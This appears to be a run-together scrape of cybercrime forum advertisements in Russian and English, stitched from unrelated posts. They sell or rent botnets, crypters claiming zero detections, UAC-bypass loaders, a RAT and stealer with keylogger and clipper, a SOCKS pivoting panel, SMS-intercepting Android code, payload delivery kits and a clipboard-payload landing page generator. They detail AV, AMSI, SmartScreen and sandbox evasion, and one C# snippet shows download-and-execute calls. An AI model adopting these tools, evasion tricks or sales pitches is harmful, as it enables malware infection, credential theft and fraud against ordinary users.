-Полностью написан на powershell. За исключением нескольких вставок кода на C# для работы с WinAPI и либ, используемых для чтения БД и декрипта стиллдаты. Сами либы белые, никаких проблем с АВ не вызывают.
-Автоматическая обфускация билдов и всех модулей. Используется полноценный AST обфускатор с гибконастраиваемыми параметрами, под капотом уже все сконфигурировано под оптимальную работу с данным софтом. Обфускация модулей происходит в фоне раз в несколько минут. Также при обфускации скрипта в него добавляется логика отключения AMSI. Обфускация касается только ps файлов, если будете юзать exe или dll врапперы, то нужен дополнительный крипт.
-Стейджинг. Скрипты, выполняемые на боте, в плане стейджинга делятся на три категории: лаунчер, мейн скрипт и модули. Лаунчер вшит в билд, примерно такой же скрипт прописывается в систему после добавления бота в панель. Задача его в том, чтобы выгрузить из панели мейн скрипт и запустить его. В мейн скрипте по интервалу производится поллинг панели и запуск модулей. Информацию по модулям см. выше.
-Использование прокладок для скрытия адреса панели.
-Для удобства анализа источников трафика используются так называемые кампании. Работа с ними выглядит примерно следующим образом: создаем кампанию, под капотом конкретно под нее генерируется ссылка для превого отстука бота, она же вшивается в билд. Таким образом панель понимает с какого именно источника добавлен бот. В панели имеется стата и возможность фильтрации ботов по кампаниям. После пролива кампанию можно удалить, после чего все созданные для нее билды станут невалидными (уже добавленные боты никуда не пропадут), таким образом после завершения работы отсекаются всевозможные ресерчеры, они просто не смогут добавить бота в панель. Также при создании разных кампаний можно указывать разные прокладки, на которые будут стучать боты добавленные именно с этого билда.
-Обход детектов по сетевым сигнатурам. На каждой итерации поллинга панель генерирует боту новую одноразовую ссылку для следующего отстука или выгрузки модуля, если для бота висит какая-либо задача. Таким образом в панели нет статичного эндпоинта для общения с ботом, каждый последующий запрос будет производиться по уникальной ссылке. Также для шифрования трафика на каждой итерации генерируется рандомный ключ, следовательно, каждый отправляемый или получаемый пакет тоже будет уникальным.
-Персистенс. Использованный здесь способ закрепа характерен только для powershell, в нейтиве такого закрепа нет, этот способ менее заюзан, а значит менее палевный для АВ.
-ps1, exe, dll билды. Вес билда ~ 40кб. Может немного варьироваться, тк обфускатор использует много рандомных значений. Добавление дополнительных расширений по договоренности.
-Возможность прямо из панели отслеживать ход выполнения любых модулей через дебаг менеджер. Также включает в себя и лог ошибок при выполнении скриптов, что облегчит выявление проблем и их причин и фикс возможных багов.
-Красивая и удобная панель с множеством параметров фильтрации, статой, хелпом и возможностью добавления ботам тегов и комментов.
-Для повышения безопасности вход в панель осуществляется не только по логину и паролю, но и с указанием заранее заданного юзерагента. Все запросы без этого юа панелью будут проигнорированы.
Spoiler: Условия
-Стоимость аренды 4к в месяц. Сервера и прочую инфраструктуру предоставляем мы сами.
-Софт сдается в аренду одновременно только в 5 рук.
-Запрещается добавление ботов без использования прокладок.
-По дефолту предоставляем одну прокладку. За отдельную плату можем выдать дополнительные.
-Возможность разработки и добавления каких-либо дополнительных модулей персонально под ваши цели оговаривается отдельно.
-Также по договоренности можем разработать и добавить дополнительные расширения для билдов.
-При выявлении каких-либо проблем в работе софта обещать успешное их исправление можем только в случае предоставления вами шагов для моделирования данной проблемы. При обращении вроде "один раз видел, что что-то пошло не так, но не знаю что именно" результат обещать не можем, но все же сделаем все возможное с нашей стороны.
-Софт не работает в странах СНГ.
-Запрещается использование софта для пентеста, перемещения по сети и любых прочих действий, как-либо связанных с рансомом. Следить за вами, разумеется, никто не будет, но если где-то подобная информация всплывет, последует прекращение предоставления услуг без манибека. В любом случае, по описанию понятно, что это далеко не идеальный продукт для использования его конкретно под red team, для этого есть более подходящие софты.
-Запрещается слив любых компонентов софта в паблик или на VT и подобные конторы. За этим также последует отключение без манибека.
Первый контакт - ЛС.
A completely new Play Store android loader source for sell
Only 1 simple Permission needed to Publish loader just like any other apps
.Loader can attached to all kind of themes Finance and other whatever you
want.
High install rate %
PM for details
No rent only source sell
Escrow Accepted as Always
Привет, пакую ваши файлы, обхожу антивирусы. В приоритете обходить в первую
очередь Windows Defender, на AvCheck/Kleenscan как правило всегда 0, на
последнем скане Virustotal было около 4 детектов, scanner.to - 1/21
Немного из возможностей:
· Нестандартная загрузка модуля в память, обёртка над системным загрузчиком
· Уникализация стаба. Каждый клиент при покупке получает свой (относительно)
уникальный стаб, уникальный алгоритм шифрования
· Обход AMSI для ваших .NET ассембли, пейлоад не детектится в памяти
· Иконки, информация о версии, повышение привилегий через манифест (UAC
Bypass), Autorun с рераном к вашим услугам
· Anti-VM, не запускается в песочницах, в облаке не распаковывается
· Для нативных и 32-битных файлов возможен пак с рантайм защитой (на этапе
тестирования). Если это RAT (к примеру), то с такой защитой он может работать
без детектов продолжительное время (_Indy inspired)
· Можем попробовать сделать Sideloading с нужным софтом, есть возможность
подгрузки вашего файла в контексте другого процесса, но нужно время на поиск
уязвимостей в нужном софте/время на тесты
Ремарки:
1. Обход SmartScreen не гарантирован. Используйте lnk/hta/другие скрипты для
обхода, ставьте сертификаты, "прогревайте" файл, но смартскрин я не смогу
обойти, можем попробовать Sideloading
2. Рантайм. В большинстве случаев, если ваш софт обновляется, с рантаймом не
должно возникнуть проблем. Можем попробовать решить проблему мем-детектов если
ваш файл x32 и нативный, но Mimikatz я вам без детектов в рантайме не запущу
:Р
3. Обход Chrome. Не надейтесь на то, что с обычным криптом вы сможете грузить
файл по Direct-ссылке. Используйте архивацию, доверенные домены, другие методы
доставки. Как правило, если файлообменник доверенный и вы не заливаете файл
без архива, Chrome пропускает файл
4. Стабы не стучат по СНГ, ex-СНГ (no CIS)
Постоянно дополняю и обновляю свой пакер, не оставлю вас с детектами, подписки не продаю, с каждым пытаюсь вести работу индивидуально, если не могу обойти нужный антивирус - просто возвращаю деньги
Контакты:
PM
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FH_WsdJvbDXTbX038LNVxtroaoNG3Hk- _Lkmb8bjinQ263hEJa7vG_JEJDuKwbFHCO_DNppq5co7B_9XRQGVnpwMpCjhocAxmsyg7GOYKKtI70KKGn3vHwq0Ly2IAq_wZR-71fDen6hBpiOAK2kjw3Rdvu6I8Burvc8FuWcJC7AEfy0xkg4ziQSpUyV_1U1tyuZCP2p6AjXMUtoPkS2QTzTHT6JdtZ8V_bVoMMXnlnF- Ta2IdjjJSEUkzSymNUtizyfgyaDyfYYDgYTELhGa1vD-icKfAv8N8rZUwDSv- ircBByRK0Dbb3C57DpzwXoiU6fBTjLic7w2LaY7uhtmz3w.jpg&hash=67f0effccad9ba0c3bce1b3ac23c009a&return_error=1)
You can contact @shanya0xff right away.
t.me
Куплю Nighthawk 0.2.6. Или обмен на мою старую версию 0.2.4 с моей доплатой
Гарант +
Связь пм.
Продам исходники многофункционального, многомодульного бота, а также исходники инструментов для спама/крипта/дропа. Ниже приведу описание всего, если потребуются детали могу уточнить в лс. Бонусом идёт LLVM-компилятор (с обфускацией) с батником для простой установки, а также могу отправить вам 100 emercoin (для создания абузостойких emercoin-dns доменов).
Spoiler: Bot
Нативный (написан на С/С++), без обфускации выходит около 30кб веса. Работает
от Windows XP до Windows 11 (за исключением некоторых фич на старых линейках
ОС).
Взаимодействие с сервером на основе протокола HTTP, есть возможность задания
emer-dns доменов.
Состоит из 2х основных элементов - лоадер (x32 .exe, которое и закрепляется) и
бот (x32 и x64 dll), который инжектится в системный процесс.
Для улучшения рантайма и защиты от удаления было принято ряд мер.
- Максимальная обфускация билдов (лоадера и основных dll) (динамическая
расшифровка строк рандомным ключём, API которые берутся по хешу (меняются не
только хеши, но и сами алгоритмы хеширования), LLVM-обфускация, рандомизатор
IAT)
- Использование шелкодов (шифрование каждый раз новым ключём), HeavensGate,
анхукинг
- Использование средств для защиты от песочниц/вм и средств
отладки/дизасемблирования, а также грамотный Sleep
- Ring3 rootkit
- Защита от удаления лоадера и перезапуск процесса в случае убийства
Инжект dll производится по средством reflective dll injection (никакого дропа на диск, прямо в память). Сам лоадер (exe) по минимуму старается взаимодействовать с системой (не создаёт ничего в реестре, не копирует себя и прочие подозрительные вещи не делает, помимо инжекта естественно).
Spoiler: Bot features
- AntiCIS
- Update/Uninstall/Reboot
- 4 метода повышения прав
- Hidden Desktop (Chrome, Opera, Edge, Brave, Firefox, Internet Explorer)
- HVNC/lighHVNC/HVNC Webcam
- HRDP
- VNC
- Port forwarding
- reverse SOCKS4a, SOCKS5
- Download&Execute (на диск)
- RunPE (x32, x64)
- cmd.exe execute
- inject shellcode
- inject dll to svchost
- execute dll from rundll32
- Poweroff/Reboot/BSoD/Hibernate
- DDOS (GET, POST, SYN flood, Slowloris, UDP Flood)
- Disable WinDef
- Create/Delete Windows User
- Delete Cookies
- Send screenshot
- Record video and send to C2
- Keylogger (if found interesting e.g. login pages, crypto tag it as "Hot")
- Porndetector (if the victim is fapping get webcam screenshot and send to
C2)
- Clipper (BTC/ZCASH/XMR/DOGE/ETH)
- Stealer (рекурсивный сбор всех хромиум, геко, крипто расширения,
криптокошельки, Steam, Battle.NET, Telegram, Discord, Jabber, VPN, FTP,
Screenshot, Webcam и другое стандартное).
- Также имеются наработки по майнеру, вебинжектам и банкеру.
Spoiler: Panel and Servers
Панель написана на PHP.
- Имеется статистика в виде графика и чартов по инсталам и их характеристикам
(ос, ав, проц, гпу, тэг)
- Имеется система "воркеров" и разделение доступа к определённым страницам
воркера.
- Имеется страница с ботами где можно просмотреть подробную инфу о боте и
удалить бота
- Имеется страница с картой, где можно посмотреть статистику на карте и в
таблице по странам
- Имеется страница с картинками, где можно посмотреть скрины при входе в
важную страницу или окно (делает кейлогер), видео и скрины с вебкамеры
- Имеется страница с кейлогами
- Имеется страница с инфой о стилере (логи, конвертер cookie, настройки)
- Страница с заданием тасков
- Разработано API для доступа извне
Для использования некоторых функций (Portforwarding, HiddenDesktop, HVNC, lightHVNC, SOCKS) нужно будет на дедике использовать некоторые exe. Для упрощения эксплуатации были разработаны упрощающие программы (программа для лёгкой конфигурации и программа для лёгкой эксплуатации без ручной задачи тасков).
Spoiler: Tools
Также в комплекте идут некоторые инструменты, которые могут быть полезны.
- Cryptor (LoadPE shellcode, в последнее время не использовался поскольку
проще купить чем поддерживать и морочить голову с обходами и сертами).
- .NET Droper. Обычный дропер, можно грузить несколько файлов, тем самым
сэкономив средства и детекты на склейке.
- GoDroper. Написан на языке Go, поддержка XP+, имеется обфускация
исходников.
- Спамеры Discord/Telegram/Facebook. Как средство дополнительной "выжимки"
логов по средству отправки в чаты знакомых жертвы. Telegram имеет также
конвертер в разные форматы.
Удобней всего было бы контактировать по лс форума.
N/A
MrAnon Handmade Crypt
0/21 Runtime Bypass ALL AV
Longtime FUD Result
Windows Defender Bypass
Bypass SmartScreen
Bypass Chrome Warning
Bypass AMSI
EDR + XDR Bypass
Output = exe + DLL in zip
Scan Runtime - https://scanner.to/result/hJ567KBLM8tK
Buy TG - @Anontool
Join TG - @Mranoncrypters
Ru -
Spoiler: RU
MrAnon Handmade Crypt
0/21 Прохождение Runtime ALL AV
Долгосрочный результат FUD
Обход защиты Windows Defender
Обход SmartScreen
Обход предупреждений Chrome
Обход AMSI
Обход EDR + XDR
Выход = exe + DLL в zip
Сканирование Runtime - Ссылка
Покупка - @Anontool
Присоединиться - @Mranoncrypters
Примерно 95% таргетов с этого эксплойта не отработано (так как у них нет
учеток в LDAP).
В этом топике я продаю решение, позволяющее пробиться в эти таргеты.
Все вопросы и информация о работе скрипта в PM (только потенциальным
покупателям).
После покупки вы получаете полную инструкцию по работе со скриптом.
Сделка проводится исключительно через гарант и никак иначе!
Продажа в 2 руки.
Цена: 3.5k$
Первый контакт в PM.
Доброго, посетители темы. Хочу разместить на продажу исходный код самописного лоадера, имеющего возможность запускать exe файлы от имени администратора с обходом UAC предупреждений, а также возможностью запускать DLL пейлоады в памяти. В лоадер можно указать хоть миллион разных пейлоадов посредством добавление одной строки кода. Сам лоадер написан на C# на фреймворке net4.0 (встроен с коробки в win7-win11), а весит не более 9КБ (в стандартной комплектации без доработок). Обход UAC окна и запуск от имени администратора реализован через fodhelper.exe (проверен на всех сборках win10 и win11, не ручаюсь за работу на win7, win8, win8.1)
Функционал лоадера
1. Возможность скачивать и запускать exe файл (с обходом UAC и без него)
2. Возможность скачивать и запускать dll файл в памяти (с обходом UAC)
3. Возможность включить autorun для лоадера (запуск лоадера при каждом
включении ПК)
4. Возможность выключения Windows Defender на системе жертвы
Реализована анти-снг проверка по установленным языкам в раскладке системы
Есть возможность компиляции через csc.exe, весь код реализован в одном .cs файле
Как добавлять пейлоады в лоадер?
C#:Copy to clipboard
# Скачать и запустить exe файл БЕЗ обхода UAC
ExecLoader("downloadrun", "ссылка на exe файл");
# Скачать и запустить exe файл с обходом UAC
ExecLoader("uacbypassexe", "ссылка на exe файл");
# Скачать и запустить DLL файл в памяти с обходом UAC
ExecLoader("uacbypassdll", "ссылка на dll файл");
Таких строк вы можете добавить миллион, а выполнение будет поочередным. Если нужно, я могу дописать, чтобы выполнение всех команд было асинхронным (будет запускать все в нескольких потоках, сократит время выполнения задач), также могу дописать уведомления о запусках в телеграм
Продажа осуществляется только через escrow и только таким образом: вы создаете сделку через escrow, я выдаю вам все исходники, после проверки вы подтверждаете сделку
Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug (телеграмом пользуюсь редко, но буду стараться быть онлайн 24 часа в сутки)
Есть вопросы? Не стесняйтесь задавать их в теме или в личных сообщениях
Лигитимное Приложение для Android - > мониторинг смс собщений, определённых номеров - номера можно менять в коде,приложение отправляет определённое смс в телеграмм бот. Приложение работает в фоновом режиме , приложение запрашивает разрешения для работы с смс и уведомленияим. приложение работает на версиях Android с 6 по13 версию. Приложение подойдёт для точечной работы. Продам исходный код на kotlin. В комплекте исходный код + apk
Панель управления Sock5 реверс-прокси, подходит для пивотинга в сеть или использования как закреп в сети.
Особенности агентов:
- Написан на Go
- Формат - исполняемый файл
- Обе архитектуры - x86 и x 64
- Возможность устанавливать как службу Windows
- Запуск без параметров - все параметры подключения вшиты в сборку
- Работа на всех версиях Windows. Для старых ОС есть legacy версии агентов.
- При отсутствии подключения к серверу, агент прекращает работу
- Трафик между агентом и сервером зашифрован TLS и защищен уникальной пасс-
фразой
- https://scanner.to/result/sqBZWHn6rwbK
Возможности панели:
- Для каждого socks-сервера генерируются уникальные агенты. Сборка с
обфускацией.
- Неограниченное количество socks-серверов
- Полный контроль над socks-серверами (создание, запуск, остановка, удаление,
управление автозапуском)
Особенности SOCKS-серверов
- Стандарт Socks5
- Подключение клиента защищено аутентификацией
- Подходит для работы, как через proxychains, так и через Proxyfier
- Потери в скорости, на вскидку, порядка 10-20 процентов
Условия:
- Панель выдается "под ключ" на вашем сервере.
- Каждая инсталяция привязывается к конкретному набору "железа" и имеет,
оговоренный при заказе, срок службы (лицензия).
- Срок лицензирования кратен периоду "месяц" (условно, "с первого мая по
первое июня").
- На все время действия лицензии гарантируется поддержка и исправление
критических багов.
- Оплата единоразовая, сразу за весь период.
- Стоимость **$300 за месяц
Скриншоты:**
Уважаемый Клиент.
Здесь будут описаны достоинства, правила использования приватного Loader,
который вы арендуете.
Название продукта: AresLoader V1.2.
Месячная аренда обойдётся в 300$. Никаких скидок не предусмотрено. В стоимость
включены: rebuild по просьбе клиента, для каждого клиента выдаётся уникальный
стаб. Любой rebuild может занять некоторое время, т.к. данная услуга
оказывается исключительно вручную, но долго ждать мы не заставим.
Помимо этого, build включает в себя обфускатор строк, мусорные инструкции,
задержку математическими вычислениями, обход песочниц.
После приобретении лицензии админ создаёт пользователя в нашей системе:
Загрузку всех файлов производит арендатор:
=================================
Принцип работы AresLoader V1.2 заключается в том, что он подгружает легитную
программу ( не обязательная функция ), запускает её тем самым чем то похож на
лаунчер, следом срабатывает задержка математическими вычислениями ( от 10 до
100 секунд, по просьбе клиента можем убрать), подгружает все вредоносные
программы клиента ( до 5 PE файлов, битность не важна ), закрепление
вредоносных файлов на автозагрузку.
Все имена и переменные генерируются по ходу работы AresLoader V1.2 и все они полностью random.
В панеле ведётся статистика уникальных отстуков:
Для уточнения конкретики, связанной с работой и функционала AresLoader V1.2 — свяжитесь с командой, мы готовы ответить на любой вопрос. Т.к. билдер идёт в виде конструктора, они могут возникнуть.
Так же, в связи с тем, что AresLoader 1.2 будет совершенствоваться, будут вводиться различные обновления они могут быть как платными, так и бесплатными. В любом случае мы Вас оповестим о грядущих нововведениях, объясним что и где будет обновлено / модернизировано.
=================================
Предусмотрены правила использования. К попытке изменения или их нарушения относимся критично, вплоть до блокировки пользователя.
1. Перепродажа лицензии ЗАПРЕЩЕНА.
2. Мы не несём ответственность за любые потери арендатора.
4. Запрещено выкладывать бинарный файл AresLoader V1.2 в общий доступ.
5. Запрещено заливать AresLoader V1.2 на Virus Total.
ВСЕ СДЕЛКИ ПРОВОДИМ ЧЕРЕЗ ГАРАНТА ФОРУМА.
Со своей стороны команда Разработчиков готова обеспечить комфортное использование нашего продукта. В скором времени будут доработаны обновления и прочие дополнения функционала для улучшения работы, увеличения потенциала использования Нашего AresLoader V1.2. При каких-либо вопросах готовы выйти на связь в удобное время и решить возникшие проблемы. Ищем долгосрочное сотрудничество и добросовестных Клиентов.
С Уважением, команда AresLoader.
Ищу кто может грамотно склеить.
контакт в пм
Introducing Impact Solutions – the ultimate all-in-one package featuring the most effective and successful delivery methods on the market.
Our service offers a wide range of attack vectors to ensure that your payloads
consistently it inboxes and get executed.
Our team of professionals is constantly researching the most innovative
techniques used in the industry, improving them for ease of use and maximum
reliability.
With Impact Solutions, you can trust that your delivery strategies are at the
forefront of effectiveness.
In a single bundle we currently we offer:
Spoiler: View our html exploit demo video
Spoiler: View our general demo video
Spoiler: View our Svg demo video
And many more features you can see in our demo videos.
Tariffs:
BASIC - 230$ / month
~ Available delivery methods: .lnk .bat .vbs
~ Updated and cleaned weekly
STANDARD - 640$ / month
~ Available delivery methods: .lnk .bat .vbs .js .ps1 .hta
~ Windows Defender bypass guaranteed
~ Updated and cleaned multiple times per week
PRO - 1340$ / month
~ Available delivery methods: .html .svg .url .lnk .bat .vbs .js .ps1 .hta
~ Best detection rate possible, Windows Defender and most AVs bypass
guaranteed
~ Updated and cleaned as soon as a detection happen
Contacts:
Telegram > https://t.me/impact_solutions_support
Tox >
13C8A9787381E028BC17B6BD81C24144CE891E85A215739D611A2053BD52A5539490F582DAEB
Представляем вашему вниманию Impact Solutions - идеальное решение «все в
одном», включающее в себя самые эффективные и успешные методы доставки
полезной нагрузки на рынке.
Наш сервис предлагает широкий спектр векторов атак, чтобы гарантировать, что
ваша полезная нагрузка будет попадать в нужное место и успешно выполняться.
Наша команда состоит только из профессионалов постоянно изучающих самые
инновационные методы, используемые в индустрии, совершенствуя их для простоты
использования и максимальной надежности.
С Impact Solutions вы можете быть уверены, что ваша работа будет максимально
эффективной.
Покупая наш продукт вы получаете:
Spoiler
Spoiler
Spoiler
И многие другие возможности, которые вы можете увидеть в наших демонстрационных видео.
Вы можете приобрести одну из следующих лицензий:
BASIC - 230$ / month
_> Доступные методы доставки: .lnk .bat .vbs
Чистка стаба производится еженедельно_
STANDARD - 640$ / month
_> Доступные методы доставки: .lnk .bat .vbs .js .ps1 .hta
Гарантированный обход Windows Defender
Чистка стаба производится несколько раз в неделю_
PRO - 1340$ / month
_> Доступные методы доставки: .html .svg.url .lnk .bat .vbs .js .ps1 .hta
Лучший антидетект, обход WD и большинства AV гарантирован
Персональный стаб, чистка по запросу._
Telegram > https://t.me/impact_solutions_support
Tox >
13C8A9787381E028BC17B6BD81C24144CE891E85A215739D611A2053BD52A5539490F582DAEB
Terms of services:
**ZAECRYPT. СЕРВИС КРИПТОВАНИЯ
ПРАЙС | PRICE**
Подробное описание в телеграм канале (https://t.me/zaecryptchannel)
More details in telegram channel (https://t.me/zaecryptchannel)
Контакты | Contacts
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FSAcF5aCbbNxO- vp8oGUHUhpCpqA6OrbOh586UjZGNGfL1VoU4T-lgRh2r_sSDVGyeYkSgb65-5OukW5vBTzJRc0YDpajLdVPNtcvb_z- vmKQ4IShNkv9FSNLMOaZNmNyF3Nohv1LORtPEIqwoidjTl9_Sh-8VPNgHE0V6p2IuxzRT1IcrvhgkhV9DJ4AwyPxWYTBVSdmGKIvWd6co5aShjeookeUhsMVpbmzOX5Q3CWMWNNZI7EKfh0gZZGnbLyUmiqa27SbYaeHP154P6n-IXoCtjGidMhU85bodZ9aM4nFoI18ieY0ckYuVsLfSEGTdP_mFbFwKP_f9ksLP4iD4Q.jpg&hash=eb718df5a5a6e3521d3542854f309327&return_error=1)
You can contact @zaecrypt right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FfWx4KncD- MU3JkgdsYfc62MGDu99L8jH3lggZjIxiSq9CyzFS1Ve5r6Z8sE4EuqmCDPulGZeI2jOcVF2eG4V-iKugxxBqgW2a5AWPU2shmipWe6vJy7O23javOVwS5dq4qYewEUvYkHBz7TEEhsz9YFGoY3jy3ov5p2qs77vP9ZiSkj917mzig8vDaKhOKg7ts4maZfVGvIK0oUzEwL4J9KkfAzZiKOM_RhVF_D8WPp5VIMJm_YOSw9zjLFY7R9yir8WRoYTvRr_6nuYOuruzbNj7B5GVqTmDXeqYssZ3NmGkmcxVP8SmXdRSWckP-5D-p7Hr77dqCCjMLi2hDmRTg.jpg&hash=5e77e6191a69a629c706858b3d40262e&return_error=1)
https://zaecrypt.com - user panel https://t.me/zaecrypt - support
t.me
Рабочие часы: 10am-8pm Moscow Time
Chili Protector Service
Telegram Bot for securing your software (.exe) //Телеграм бот для защиты
вашего ПО (.exe)
Welcome to Chili Protector! // Добро пожаловать в Chili Protector!
RU /
**Основные характеристики:
Уникальное шифрование**: каждый файл уникально зашифрован с разницей в 80–91 %.
уклонение от антивирусной защиты: оставайтесь впереди с ведущей в отрасли защитой среды выполнения.
Универсальная совместимость : поддерживает x32, x64 и все версии .NET, работая без проблем без зависимостей.
Доступная цена : 40 долларов за сборку с оптовыми скидками.
Регулярные обновления : еженедельные обновления среды выполнения для оптимальной эффективности.
Высокая скорость : защита файлов выполняется за считанные секунды.
Доступная цена : 40 долларов за сборку с поддержкой автоматизированных платежей для BTC, ETH, LTC и USDT (TRC20).
Регулярное сканирование и очистка : общий доступ к результатам AVCHECK (выпускается ежедневно по времени GMT+1).
Защита от автозапуска : обеспечивает запуск файла при запуске с защитой от завершения.
Ложное выполнение : добавляет скрытности, запуская вторичный файл.
Пользовательский значок : заменяет или копирует значки из существующих приложений.
Обнаружение антианализа : предотвращает выполнение в контролируемых средах.
**Основные моменты:
Автоматизированная служба**: полностью оптимизированная система для беспроблемной защиты файлов.
Удобство для пользователя : подробные руководства по всему интерфейсу бота.
Языки : в настоящее время поддерживает английский и русский языки, планируется больше языков.
AMSI : Встроенный байпас включен.
_Примечание :
Эта служба станет автоматизированным преемником EchoCRYPT после нескольких обновлений. EchoCRYPT, который по-прежнему доступен для пользователей с большими индивидуальными требованиями, такими как пользовательские DLL. Обе службы остаются активными и готовыми удовлетворить ваши потребности. Хотя поначалу потребуется несколько минут, чтобы применить обновления, будьте уверены, будет много функциональности. Мы находимся на ранней стадии запуска этой службы, на нашем канале, указанном ниже, будут новости и обновления._
EN /
**Main features:
Unique Encryption**: Each file is uniquely encrypted with an 80-91%
difference.
Advanced AV Evasion : Stay ahead with industry-leading runtime protection.
Universal Compatibility : Supports x32, x64, and all .NET versions, working seamlessly without dependencies.
Affordable Pricing : $40 per build with bulk discounts.
Regular Updates : Weekly runtime updates for optimal efficiency.
High Speed : File protection is completed within seconds.
Affordable Pricing : $40 per build, with automated payment support for BTC, ETH, LTC, and USDT (TRC20).
Regular Scanning and cleaning : AVCHECKresults shared(issued daily at GMT+1).
Autostart Protection: Ensure the file runs on startup with termination resistance.
Decoy Execution: Add stealth by running a secondary file.
Custom Icon: Replace or copy icons from existing applications.
Anti-Analysis Detection: Prevent execution in monitored environments.
Highlights:
Automated Service : A fully streamlined system for hassle-free file protection.
User-Friendly : Extensive guides provided throughout the bot interface.
Languages : Currently supports English and Russian, with more languages planned.
AMSI : Built-in bypass included.
Notice :
This service will be automated successor to EchoCRYPT after few updates. EchoCRYPT, which is still available for users with heavy custom requirements, such as custom DLLs. Both services remain active and ready to meet your needs. Although at first, it will take moments to apply the updates but rest assured, there will be lots of functionality. We are in early stage with this service launch, there will news and updates on our channel provided below.
Spoiler: F.A.Q / Information // F.A.Q. / Информация
RU /
Поддерживаемые типы : x64/x86, Native/.NET (4.0/3.5/2.0).
Убедитесь, что ваш файл соответствует условиям :
Примечание : Файлы, преобразованные в .exe с помощью инструментов типа PyInstaller, несовместимы.
EN /
Supported types : x64/x86, Native/.NET (4.0/3.5/2.0).
Ensure your file meets these conditions :
Note : Files converted to .exe using tools like PyInstaller are not compatible.
To explore the functionality of Chili Protector bot // Чтобы изучить функциональность бота Chili Protector (https://t.me/Chili_Protector_Bot)
To receive latest news and updates along with freebies, Join Chili Speech // Чтобы получать последние новости и обновления, а также бесплатные материалы, присоединяйтесь к Chili Speech(https://t.me/chilispeech)
**Good day,
Service details:-**
- Support Native & .NET [C Stub & .NET Stub]
- Unique Stubs, each file Encryption is difference by %100.
- No Stub is shared each Stub dedicated to one File only.
- Scantime Runtime FUD 0/26 0/38 2-3/21
- Bypass WD & Cloud, AVs and %90 of EDRs.
- Icon Change available, Clean size pump, Startup option.
- Antis option (Prevent execution in monitored environments) such as Sandbox,
VMs.
- Bind with white software (Installer Maker) option can be done too
Price:-
$100 per File Encryption
$250 per 1 Day Encryption
Remcos Bin Scan (ill post more scans later from AVcheck and Scanner):
No engine(s) detected this
file.
TOX :
6F13AE7E4DBB39A9B2E028D62ACFDC3C8A2C12232DAB4785455457C1BBED350C023602CFB716
(Faster communication)
Jabber1:Darkmatter@jabb.im
Jabber2 : Darkmatter1@thesecure.biz
feel free to contact me if you have any question, Always welcome!
Info (Ignore the Beta mark):
● Bot written in C++ and the panel is in PHP
● Will retry failed connections after 30 seconds
● Can perform 14 different tasks sent by the panel:
Password extraction
Credit Card extraction (will also grab 3-4 digits from the auto-fills as it
could contain a potential CVV code)
Wifi key extraction
Cryptowallet seed extraction (will search directories with patterns that match
wallet phrases)
Remote Clipper (you will need to specify the regex pattern and the wallet
address in the panel)
.exe (Disk)
.exe (Memory + No Disk)
.vbs
.ps1
.cmd
.dll (rundll32)
.py
Uninstall
Update
● No memory leaks
● Will not work on Russian computers
● Communications are encrypted and everything that is sent
● Available processes for injection:
Native 32-bit:
C:\Windows\System32\notepad.exe
C:\Windows\System32\ping.exe
C:\Windows\System32\calc.exe
C:\Windows\System32\cmd.exe
Native 64-bit:
C:\Windows\SySWOW64\notepad.exe
C:\Windows\SySWOW64\ping.exe
C:\Windows\SySWOW64\calc.exe
C:\Windows\SySWOW64\cmd.exe
Non-Native:
vbc.exe
AppLaunch.exe
regasm.exe
MSBuild.exe
CasPol.exe
jsc.exe
regsvcs.exe
InstallUtil.exe
● Some pages have a CAPTCHA mechanism
● The overview page will show general info of everything that is in the panel
● The task creator page allows you to send remote commands to the bot.
Textboxes will appear and disappear depending on the command (CAPTCHA
enabled)
● The task shower page allows you to pause, delete and resume tasks
● The database access page allows you to wipe data from the SQL database at a
stroke of a mouse
● The user adder page allows you to create new panel users to log in. You can
either make the user a visitor or an admin (CAPTCHA enabled)
● The bot black-lister allows you to blacklist bots you don't want
(CAPTCHA enabled)
● For more info you can check the screenshots
● The panel has been tested with SQLmap, Ghauri, and OWASP ZAP Scanner and
no vulnerabilities appeared
Escrow :
● Escrow is accepted
● Watch out for scam channels. If you are in doubt, use escrow.
Scans :
● Scantime (FUD): https://avcheck.net/id/bzhJmmpLnfVW
● Runtime (3/21): https://scanner.to/result/k8ghZwdwzjLS
**If the bot rises in detection, please let me know
Contact me **(if you want to purchase or have questions or look at the
updates):
● TG (telegram): @heartbitsupport
● TG 2 (telegram): @xerphbot_support_channel
Price :
● Lifetime build + panel: $390
Куплю последнюю версию. Сделка через автогаранта.
Создавайте эффективные лендинги с интегрированной капчей и автоматическим
копированием полезной нагрузки в буфер обмена пользователя после прохождения
верификации. Этот инструмент поможет вам автоматизировать процессы и защитить
ваш контент от ботов и спама, при этом скрыто передавая важные данные
пользователю.
Ключевые особенности:
Интегрированная капча
Автоматическое копирование полезной нагрузки
Обфускация кода
Обход алертов браузеров
Обход системы SmartScreen
Обход всех возможных системных алертов при скачивании
Простая настройка и генерация лендингов
Готовые шаблоны: Встроенные современные шаблоны для создания различных типов страниц — от маркетинговых лендингов до страниц загрузки файлов.
Преимущества использования:
Автоматизация процессов: Полезная нагрузка копируется автоматически, упрощая
работу и увеличивая конверсию.
Интуитивно понятный интерфейс: Легкость использования позволяет создавать
лендинги быстро и без лишних трудностей.
Экономия времени: Быстрое создание лендингов с встроенной защитой и
автоматизацией — идеальное решение для тех, кто ценит свое время и
безопасность данных.
Контакты для связи:
Telegram: https://t.me/LusiSup
qTox:
0101B013141C2B44C295F3717563E2F74DEF2FF621387FB981CBC611B622C2445238CFBFBA99
EN:
Create effective landing pages with integrated captcha and automatic copying
of payloads to the user's clipboard after verification. This tool will help
you automate processes and protect your content from bots and spam, while
stealthily transferring important data to the user.
Key features:
Integrated captcha
Automatic payload copying
Code obfuscation
Browser alerts bypass
SmartScreen bypass
Bypass all possible system alerts when downloading
Easy customization and generation of lendings
Ready-made templates: Built-in modern templates for creating different types of pages - from marketing lendings to file download pages.
Benefits of using:
Process Automation: Payloads are copied automatically, simplifying your work
and increasing conversion rates.
Intuitive interface: Ease of use allows you to create lendings quickly and
without hassle.
Time Saving: Quickly create lendings with built-in security and automation -
ideal for those who value their time and data security.
Price: 1500$ | With updates
Contact Us:
Telegram: https://t.me/LusiSup
qTox:
